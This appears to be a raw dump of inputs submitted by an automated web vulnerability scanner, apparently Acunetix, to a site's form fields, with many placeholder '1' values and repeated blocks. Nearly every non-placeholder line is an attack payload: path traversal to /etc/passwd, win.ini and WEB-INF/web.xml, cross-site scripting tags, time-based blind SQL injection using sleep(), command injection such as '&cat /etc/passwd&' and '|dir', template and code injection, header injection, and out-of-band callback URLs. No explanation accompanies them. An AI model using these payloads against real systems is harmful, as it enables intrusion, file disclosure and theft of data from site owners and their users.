\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(985330)</script>

1

................windowswin.ini

1

1<ScRiPt >prompt(903187)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?961451></ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(928932)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(910602)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983861)"></g></svg>

1

1

response.write(9965286*9508455)

1<div style=width:expression(prompt(952584))>

1

1

1

'+response.write(9965286*9508455)+'

WEB-INF/web.xml

1<iframe src='data:text/html

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9965286*9508455)+"

1

'&cat /etc/passwd&'

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1<body onload=prompt(966831)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(966233)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

${99620+99151}

1<img src=xyz OnErRor=prompt(931337)>

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

1

-1

1

1

1

1<img/src=">" onerror=alert(962858)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n970073=v936356

1<ScRiPt%20>prompt(985433)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

-1))

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

"|"ld

HvgjwOde'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

\xf6<img acu onmouseover=prompt(942076) //\xf6>

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

r6JlKSvr')

1

testasp.vulnweb.com

'

1<input autofocus onfocus=prompt(982524)>

^(#$!@#$)(()))******

/etc/passwd

'

1

1

Vg2fI1oW'))

1

1

"

<a href='http://www.acunetix.com'>website security</a>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

http://hitvXrC1dD6Ta.bxss.me/

-1)

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

1_Mfptn <ScRiPt >prompt(990543)</ScRiPt>

&dir

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

-1))

1

1

1

1

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

n5w3UEvB'

comments

http://www.acunetix.tst

1

1

1

"&dir&"

1

file:///etc/passwd

1

hZz4Eact')

1

comments/.

1

1

'"

|dir

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(945533)</ScRiPt>

cYCm3oxc'))

1

1

<!--

1

'|dir

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(902257)</ScRiPt>

1

1

1

1

1_957404

1

"|dir

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu1309\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1309

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux2602\xc0\xbez1\xc0\xbcz2a\x90bcxuca2602

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(998374)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(954595)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(933103)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957829></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(997741)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(977386)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961731)"></g></svg>

response.write(9551286*9512618)

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(909098))>

1

'+response.write(9551286*9512618)+'

1

1

WEB-INF\web.xml

&cat /etc/passwd&

1<iframe src='data:text/html

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9551286*9512618)+"

1<body onload=prompt(998485)>

1

'&cat /etc/passwd&'

1

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(989230)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img src=xyz OnErRor=prompt(975210)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

-1

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(923791)>

1

1

1

`cat /etc/passwd`

1

${100468+99458}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1<ScRiPt%20>prompt(974837)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

|cat /etc/passwd#

1

1

1&n910420=v981161

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

1&lt

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

)

1

qbRsgtOh'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

\xf6<img acu onmouseover=prompt(915309) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

"|"ld

1

ZjruMGgD')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

'"()

1

1<input autofocus onfocus=prompt(946814)>

^(#$!@#$)(()))******

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

xTBTS4Ij'))

'

/etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

'

1

-1

[url=http://www.acunetix.com]website security[/url]

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

"

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1_r3ZQB <ScRiPt >prompt(984659)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://hit7FqDVlspUx.bxss.me/

1

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

-1))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

&dir

1

comments

1

MZyVIi9V'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1

comments

'&dir&'

1

1

F2r82JDB')

1

1

1

file:///etc/passwd

'"

"&dir&"

comments/.

1'"()&%<ScRiPt >prompt(915644)</ScRiPt>

1

tlPih4yr'))

1

/\../\../\../\../\../\../\../etc/passwd

<!--

|dir

1

'"()&%<ScRiPt >prompt(970288)</ScRiPt>

1

1

1

WEB-INF/web.xml

1

'|dir

1

1_936563

1

1

1

WEB-INF\web.xml

"|dir

1

1

acu10903\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10903

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

acux2169\xc0\xbez1\xc0\xbcz2a\x90bcxuca2169

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(980944)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(994636)</script>

1

1

1

1<ScRiPt >prompt(963062)</ScRiPt>

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976483></ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(995510)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(980796)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936672)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9664114*9464204)

1

1

1<div style=width:expression(prompt(902846))>

1

'+response.write(9664114*9464204)+'

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

WEB-INF/web.xml

1

../../../../../../../../../../etc/passwd

"+response.write(9664114*9464204)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(980245)>

'&cat /etc/passwd&'

WEB-INF\web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948122)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(974267)>

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${100266+99588}

1

1<img/src=">" onerror=alert(956033)>

1

`cat /etc/passwd`

1

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt%20>prompt(985427)</sCripT>

1

|cat /etc/passwd#

1

-1))

1&n967582=v913441

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1&lt

1

1

\xf6<img acu onmouseover=prompt(982538) //\xf6>

6QhTztBL'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

)

testasp.vulnweb.com

1

1<input autofocus onfocus=prompt(954464)>

pOlsQ9CN')

/etc/passwd

1

!(()&&!|*|*|

^(#$!@#$)(()))******

1

1

<a href='http://www.acunetix.com'>website security</a>

2VM8Fmhw'))

'"()

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

-1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

1

1_UAfzY <ScRiPt >prompt(912968)</ScRiPt>

1

-1)

1

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

http://hit8U6HZHf39L.bxss.me/

file:///etc/passwd

&dir

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

YD9oELdK'

1

1

/\../\../\../\../\../\../\../etc/passwd

1

comments

'&dir&'

1

1

1

7GsiiRaA')

1

'"

WEB-INF/web.xml

http://www.acunetix.tst

"&dir&"

comments/.

1

1'"()&%<ScRiPt >prompt(929266)</ScRiPt>

fikM54R3'))

1

WEB-INF\web.xml

<!--

|dir

1

1

1

'"()&%<ScRiPt >prompt(996625)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

'|dir

1

1

1

1_971206

../../../../../../../../../../boot.ini

1

1

"|dir

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu2120\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2120

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acux2083\xc0\xbez1\xc0\xbcz2a\x90bcxuca2083

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(915213)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<script>prompt(913435)</script>

1

1

1<ScRiPt >prompt(918095)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903472></ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(907262)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(940251)">

WEB-INF/web.xml

1

response.write(9776573*9184451)

1

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989424)"></g></svg>

1

1

1

'+response.write(9776573*9184451)+'

1

1<div style=width:expression(prompt(986908))>

1

1

&cat /etc/passwd&

"+response.write(9776573*9184451)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

'&cat /etc/passwd&'

1

1<body onload=prompt(981361)>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"&cat /etc/passwd&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(977419)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

1

1

1<img src=xyz OnErRor=prompt(966159)>

1

../../../../../../../../../../etc/passwd.jpg

1

-1

1

1

`cat /etc/passwd`

${100107+99364}

1<img/src=">" onerror=alert(991479)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n903008=v904800

-1)

1

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(971917)</sCripT>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

-1))

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

xgiNdiIv'

"|"ld

1

testasp.vulnweb.com

!(()&&!|*|*|

\xf6<img acu onmouseover=prompt(964688) //\xf6>

1

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

epPF3fbQ')

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(936082)>

1

1

/etc/passwd

'

"

vP9AnofP'))

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

"

${@print(md5(acunetix_wvs_security_test))}

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

http://hitFzdCrYEng6.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

acunetix_wvs_invalid_filename

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1_pNzfL <ScRiPt >prompt(975302)</ScRiPt>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

comments

&dir

1

1

1

1

comments

http://www.acunetix.tst

tO80EMZM'

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

file:///etc/passwd

1

comments/.

"&dir&"

mftMjfoB')

1

1

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1vCeMdIz'))

1'"()&%<ScRiPt >prompt(938061)</ScRiPt>

|dir

<!--

1

WEB-INF/web.xml

1

1

1

'"()&%<ScRiPt >prompt(957930)</ScRiPt>

'|dir

1

1

WEB-INF\web.xml

1

1_910123

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu7316\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7316

../../../../../../../../../../boot.ini

1

1

1

acux8604\xc0\xbez1\xc0\xbcz2a\x90bcxuca8604

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(920772)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(937000)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(992432)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?938526></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(967932)</ScRiPt>

1

1

1

response.write(9760533*9460239)

1<video><source onerror="javascript:prompt(974329)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9760533*9460239)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(980955)"></g></svg>

1

1

"+response.write(9760533*9460239)+"

1

&cat /etc/passwd&

1<div style=width:expression(prompt(983143))>

WEB-INF/web.xml

1

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

'&cat /etc/passwd&'

WEB-INF\web.xml

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(928325)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985355)>

SomeCustomInjectedHeader:injected_by_wvs

${99922+99687}

cat /etc/passwd

1

1&n903706=v982228

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1<img src=xyz OnErRor=prompt(992217)>

1

1

1

`cat /etc/passwd`

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

1<img/src=">" onerror=alert(991709)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1))

1<ScRiPt%20>prompt(964373)</sCripT>

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

'|'ld

'"()

testasp.vulnweb.com

1

1xCWIy3J'

1&lt

/etc/passwd

^(#$!@#$)(()))******

1

"|"ld

1

1

1

rkYtgOYr')

\xf6<img acu onmouseover=prompt(960013) //\xf6>

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1<input autofocus onfocus=prompt(976627)>

RMyWyPBk'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'

1

<a href='http://www.acunetix.com'>website security</a>

-1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"

acunetix_wvs_invalid_filename

-1)

[url=http://www.acunetix.com]website security[/url]

http://hitzNC53MH7H6.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

||cat /etc/passwd

-1))

1_pPoU9 <ScRiPt >prompt(955724)</ScRiPt>

1

1

1

1

1

&dir

comments

file:///etc/passwd

1

GFlDIhRE'

1

comments/.

http://www.acunetix.tst

1

'"

1'"()&%<ScRiPt >prompt(949484)</ScRiPt>

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

NHFft8JZ')

1

1

1

1

1

"&dir&"

<!--

'"()&%<ScRiPt >prompt(935793)</ScRiPt>

WEB-INF/web.xml

p3DabuFb'))

1

1

1

1

1_997934

1

|dir

WEB-INF\web.xml

1

1

1

1

1

acu8236\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8236

'|dir

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

acux8417\xc0\xbez1\xc0\xbcz2a\x90bcxuca8417

../../../../../../../../../../boot.ini

1

1

1

1<ScRiPt >prompt(981585)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(941365)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(964868)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952444></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(994938)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(920990)">

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(920990)">

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(920990)">

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(920990)">

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977278)"></g></svg>

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977278)"></g></svg>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977278)"></g></svg>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977278)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(944023))>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(944023))>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(944023))>

1

1

1

1

1<iframe src='data:text/html

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9510160*9182080)

1

1<body onload=prompt(929951)>

1

1

'+response.write(9510160*9182080)+'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952141)>

1

&cat /etc/passwd&

1

1

WEB-INF/web.xml

"+response.write(9510160*9182080)+"

1<img src=xyz OnErRor=prompt(982053)>

if(now()=sysdate(),sleep(10.218),0)/*'XOR(if(now()=sysdate(),sleep(10.218),0))OR'"XOR(if(now()=sysdate(),sleep(10.218),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

WEB-INF\web.xml

1

1

1

1<img/src=">" onerror=alert(996416)>

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(10.218)))v)/*'+(select(0)from(select(sleep(10.218)))v)+'"+(select(0)from(select(sleep(10.218)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1<ScRiPt%20>prompt(920926)</sCripT>

1

1

SomeCustomInjectedHeader:injected_by_wvs

-1

1

cat /etc/passwd

1

${100037+100466}

../../../../../../../../../../etc/passwd.jpg

1

1&lt

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n920726=v987766

`cat /etc/passwd`

1

1some_inexistent_file_with_long_name%00.jpg

1

\xf6<img acu onmouseover=prompt(900585) //\xf6>

1

-1))

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<input autofocus onfocus=prompt(918510)>

1

T8up8q0K'

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

'|'ld

1

<a href='http://www.acunetix.com'>website security</a>

rWkhnn2P')

^(#$!@#$)(()))******

'"()

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

1

[url=http://www.acunetix.com]website security[/url]

'

qNn3mPuS'))

1

1

1

1

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1_LgRFK <ScRiPt >prompt(930755)</ScRiPt>

"

1

1

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

1

1

